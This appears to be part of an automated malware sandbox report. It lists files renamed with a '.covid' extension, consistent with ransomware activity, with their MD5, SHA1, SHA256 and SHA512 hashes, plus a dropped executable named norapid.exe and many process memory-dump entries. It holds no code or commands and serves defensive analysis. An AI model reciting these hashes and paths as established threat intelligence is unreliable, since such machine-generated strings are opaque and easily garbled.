SHA51223342ee217661471bddd84a7c0d7565bc24064db496c52aeb0e69b96853c96d46851acc773e148e9283daea71866f08a4863aab397558425889dc00f6c7e718a
-
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\22Z68PDI85.covidMD5
5914c5b541a7c9dc446a008ab5ddff5e
SHA1c366c23706f3e26e01a10e39aba6f7904aa1897a
SHA25694c1f11d5b46bc45343c4e19992858a453bd419ba43d10ca94ad8ad38c40fd33
SHA512386a44c47be083d36a4bf7b06750083cd498ae8d88b2b6fadfb306e9261f7ecd1d8245bf42229479f4cd9a695a8d11d79baf7bfab50ad16f4416ba4b8451f663
-
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\O3J71568VP.covidMD5
4d5199aaf5834cf1b93ac7b882298278
SHA145241304f4590b319b3553e91fb0649ade8e957d
SHA2562f4833dbdfaa50580c3183e2fb0e8183f9831d8027bc8dea9e76cf8448ba7112
SHA5124c280d77f26cff3efdc844dd39a7a4df1d37ba0473a59d7e44649ba6de2876c0c0ea03ac4605ec2e32d8908ad73f1b413a6af7954138f04bf9c44256fc1ef4e4
-
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\Q5PERPZCTQ.covidMD5
54b689639483275695e1cfb4a30843b5
SHA1c47781f655aa7c001cc748f9de17c5d9cbc00672
SHA2561c810189d8dc53cc19bb396810d5d610c76a9f6fd1d9800fd2f4497587a66076
SHA5121d1ec8625634b883081d02f5b2b2bfea46ac24a16e598375aab97827ea4064800002c97a216d8cbd7688beb7f66be7d0ce77409290665e9af6949ea26781a4e9
-
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\XS1RUGNQ7F.covidMD5
9144c872e53c7570a8d949959ab525fc
SHA1eb8ce4eda6b59e26bb572455b6e495f91dfdeaa7
SHA2564c04feb4c8f3117a8612b0a8be5823427edb65cc3dfe5339d43e4908a2ad012c
SHA5126b49e0d416f16f8db40be44cc3edc0508cf03afbdd2b155e2ec85b6c511a402f95a38505d4c54798eba1935adb4b7f1b2344824fc693193a42793c097bfc45a4
-
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\FFPK1CD3TO.covidMD5
0c0ba5c4ba93031be57b94ec64539067
SHA1fb8681ced153c9d8a12125ed025066dda82c60e4
SHA2565979f1cc6456922ea3caec6b49c5d92d21f858943bbd8ce26eddbb8c017248fc
SHA512c1c9f598e99c17a4f2ef725d1f2e72484ff8dde4d416992642a500482961a8972d81ad66ead1ee8a63a698b59029141c87850052805615cf4184df1243c43fb9
-
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\MDKB4QCINR.covidMD5
dbd8455e75c2d9658b95d7c62d9ccffc
SHA103253e688c1a5ae75e3ff58346cc50a4193ba059
SHA256a54d16952cac39d3d0b04917c860f15296f508cb5ee6c0834f0184d6af0dab7a
SHA51229e2d68305a3a5d9a8274d8abee3a875ff77c02eb99523ccce12282f9b3dfbddac12ace896fb1c1ca4398fc5a9d004a823e3d1747b77a46ae240324b11687881
-
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\XP57OPTB6W.covidMD5
e7787b30bf0711c5c6d0ad020aa57795
SHA1c32ae36802ddb4fe8e00206df387fdd34d05ac97
SHA256749b9f6d4236b278c48af45f9aa3ebd6d36b9b11eb1387ea8f9f5615e608fc4e
SHA51232eae1aa18e6d893d2a45ded3a19009650348b78540532b2cff784bf7d8978f53c3944339d12c7ae6ea442c30862b5c655227d250266b20510a22b738e190176
-
C:\NCWPLHTRX5.covidMD5
16825e740e82d44c6cd2d75a2ee991be
SHA1bbc85a495ed9a74f7bc83ea3f9940a4969d225bb
SHA256c577385dd7c202be5dbf6141c11375643d32ad7cd3a4bed5ec70caf8d05c4c49
SHA51288ebebddc4a5220f32308121f70e567f3c605b6a44390744b499752932bddcb462fa8245a6680fd0187467de4b70ebee331f9427fc0bd048f52c99ddf7f2c6d8
-
C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\HFKO2QUQAS.covidMD5
fcdc5495e373007be27f7b495f409094
SHA1d359210aab68e2290e97f44f78de7f95129e4f02
SHA256f36d1800d0437395cbfa8c30297773d41907a18cef33a04f8e4ed8a192f8ebf1
SHA512df4f2bff22047c8cd79d78eae59272531be2dd130fddf36806bc2e53fcc46772a9a69705bfd7d0b679b5a76a4b3e79bc28953d69a6130b737b0e95c5a39a4003
-
C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\LJM5WIC7Z1.covidMD5
6be116a190da6adfbab6d7ee4534d0e1
SHA13c383d50059efa5a5c73fe7aa83f4131d9ed63e6
SHA256be71336ccb99a70aa0763266a0792c3a973443d0abc3fe512b2b409e35d0982a
SHA51251f3dc001d1921e12a28b9326ab43dfa79a92efdba97401480d5efcf662a05ebc1f1f7ccac531a499e2b8dcc685f6584133fd5f13f1bbaafb6efb2e962b5c873
-
C:\Users\Admin\AppData\Roaming\norapid.exeMD5
c5d02a59e543e126359998b982e87d45
SHA1e6960b254e0215493a29471949b1ff84b6da1b59
SHA256074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51
SHA5126fc4f510ab3f13e0ab49d0b46b4b7a440de33b693ba6d20c6459dd59721363fbbda59975a51f78fa85d2f452fcc519595b83d80ae580c00ab75d80adbc214721
-
C:\Users\Admin\AppData\Roaming\norapid.exeMD5
c5d02a59e543e126359998b982e87d45
SHA1e6960b254e0215493a29471949b1ff84b6da1b59
SHA256074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51
SHA5126fc4f510ab3f13e0ab49d0b46b4b7a440de33b693ba6d20c6459dd59721363fbbda59975a51f78fa85d2f452fcc519595b83d80ae580c00ab75d80adbc214721
-
C:\XS1RUGNQ7F.covidMD5
82304dadf905072f298a2d793eaa19f4
SHA14be6cf9e97e8a0389d5e48637b558f1579b08625
SHA256153568227e80de44780e002ca81a71359c0bc770da16cb81ed7eaad9a40d4a6a
SHA512cde6719cc2acb469d5ea012c21d74876f7529d235406a61206e87d823ecb41e3229192e872597ddaf8c18502e839f2942f4a6d9a01eee1293b06344eb3d8d289
-
memory/316-66-0x0000000000000000-mapping.dmp
-
memory/556-68-0x0000000000000000-mapping.dmp
-
memory/732-70-0x0000000000000000-mapping.dmp
-
memory/788-73-0x0000000000220000-0x000000000023E000-memory.dmpFilesize
120KB
-
memory/788-60-0x0000000075551000-0x0000000075553000-memory.dmpFilesize
8KB
-
memory/788-74-0x0000000000400000-0x0000000000990000-memory.dmpFilesize
5.6MB
-
memory/912-71-0x0000000000000000-mapping.dmp
-
memory/1004-81-0x0000000000000000-mapping.dmp
-
memory/1056-69-0x0000000000000000-mapping.dmp
-
memory/1180-75-0x0000000000000000-mapping.dmp
-
memory/1328-63-0x0000000000000000-mapping.dmp
-
memory/1384-62-0x0000000000000000-mapping.dmp
-
memory/1440-65-0x0000000000000000-mapping.dmp
-
memory/1468-72-0x0000000000000000-mapping.dmp
-
memory/1520-64-0x0000000000000000-mapping.dmp
-
memory/1524-80-0x0000000000000000-mapping.dmp
-
memory/1600-83-0x0000000000000000-mapping.dmp
-
memory/1604-78-0x0000000000000000-mapping.dmp
-
memory/1644-77-0x0000000000000000-mapping.dmp
-
memory/1644-194-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmpFilesize
8KB
-
memory/1684-84-0x0000000000000000-mapping.dmp
-
memory/1704-61-0x0000000000000000-mapping.dmp
-
memory/1720-67-0x0000000000000000-mapping.dmp
-
memory/1804-79-0x0000000000000000-mapping.dmp
-
memory/1852-82-0x0000000000000000-mapping.dmp
-
memory/1920-76-0x0000000000000000-mapping.dmp
-
memory/2080-85-0x0000000000000000-mapping.dmp
-
memory/2104-120-0x0000000000000000-mapping.dmp
-
memory/2108-86-0x0000000000000000-mapping.dmp
-
memory/2136-87-0x0000000000000000-mapping.dmp
-
memory/2148-121-0x0000000000000000-mapping.dmp
-
memory/2172-88-0x0000000000000000-mapping.dmp
-
memory/2192-89-0x0000000000000000-mapping.dmp
-
memory/2224-90-0x0000000000000000-mapping.dmp
-
memory/2248-91-0x0000000000000000-mapping.dmp
-
memory/2256-122-0x0000000000000000-mapping.dmp
-
memory/2284-92-0x0000000000000000-mapping.dmp
-
memory/2304-93-0x0000000000000000-mapping.dmp
-
memory/2332-94-0x0000000000000000-mapping.dmp
-
memory/2344-123-0x0000000000000000-mapping.dmp
-
memory/2364-95-0x0000000000000000-mapping.dmp
-
memory/2392-96-0x0000000000000000-mapping.dmp
-
memory/2424-97-0x0000000000000000-mapping.dmp
-
memory/2460-98-0x0000000000000000-mapping.dmp
-
memory/2468-124-0x0000000000000000-mapping.dmp
-
memory/2484-99-0x0000000000000000-mapping.dmp
-
memory/2504-100-0x0000000000000000-mapping.dmp
-
memory/2540-101-0x0000000000000000-mapping.dmp
-
memory/2560-125-0x0000000000000000-mapping.dmp
-
memory/2568-102-0x0000000000000000-mapping.dmp
-
memory/2588-103-0x0000000000000000-mapping.dmp
-
memory/2628-104-0x0000000000000000-mapping.dmp
-
memory/2652-105-0x0000000000000000-mapping.dmp
-
memory/2668-126-0x0000000000000000-mapping.dmp
-
memory/2680-106-0x0000000000000000-mapping.dmp
-
memory/2712-107-0x0000000000000000-mapping.dmp
-
memory/2740-108-0x0000000000000000-mapping.dmp
-
memory/2772-109-0x0000000000000000-mapping.dmp
-
memory/2800-110-0x0000000000000000-mapping.dmp
-
memory/2820-111-0x0000000000000000-mapping.dmp
-
memory/2852-112-0x0000000000000000-mapping.dmp
-
memory/2876-113-0x0000000000000000-mapping.dmp
-
memory/2908-114-0x0000000000000000-mapping.dmp
-
memory/2932-115-0x0000000000000000-mapping.dmp
-
memory/2968-116-0x0000000000000000-mapping.dmp
-
memory/2992-117-0x0000000000000000-mapping.dmp
-
memory/3016-118-0x0000000000000000-mapping.dmp
-
memory/3040-119-0x0000000000000000-mapping.dmp
-
memory/3120-197-0x0000000000400000-0x0000000000990000-memory.dmpFilesize
5.6MB
-
memory/3588-131-0x0000000000400000-0x0000000000990000-memory.dmpFilesize
5.6MB